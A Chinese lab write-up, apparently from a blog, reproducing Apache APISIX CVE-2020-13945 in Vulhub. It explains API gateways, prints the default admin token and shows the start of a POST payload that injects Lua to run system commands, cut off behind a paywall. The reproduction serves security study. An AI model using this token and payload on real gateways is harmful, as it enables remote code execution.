Vulhub——Apache APISIX 默认密钥漏洞(CVE-2020-13945)
APISIX简介
官方一句话介绍:Apache APISIX是一个高性能API网关。
API网关又是什么?
百度:API网关,软件术语,两个相互独立的局域网之间通过路由器进行通信,中间的路由被称之为网关。
任何一个应用系统如果需要被其他系统调用,就需要暴露 API,这些 API 代表着一个一个的功能点。
如果两个系统中间通信,在系统之间加上一个中介者协助 API 的调用,这个中介者就是 API 网关。
那意思就是Apisix是两个系统的一个中介,可以使用这个中间管理系统API。
存在漏洞:
在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。
意思就是有一个默认的Token,可以直接得到管理员权限,并插入攻击脚本。
漏洞复现
docker-compose up -d 搭建环境
docker ps 查看端口为9080
访问 127.0.0.1/asixpix/admin/routes,显示token不正确
抓这个包,把方法改为POST,加上X-API-KEY: edd1c9f034335f136f87ad84b625c8f1,加上payload
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.re

本文详细介绍了Apache APISIX的默认管理员Token漏洞(CVE-2020-13945),该漏洞允许攻击者通过默认Token获取管理员权限并执行任意LUA脚本。通过docker-compose搭建环境,演示了如何复现此漏洞,并分析了payload中的lua脚本,展示了如何利用该漏洞执行系统命令。同时,提到了修复漏洞的重要性以及理解API网关在系统间交互中的作用。
最低0.47元/天 解锁文章
1066

被折叠的 条评论
为什么被折叠?



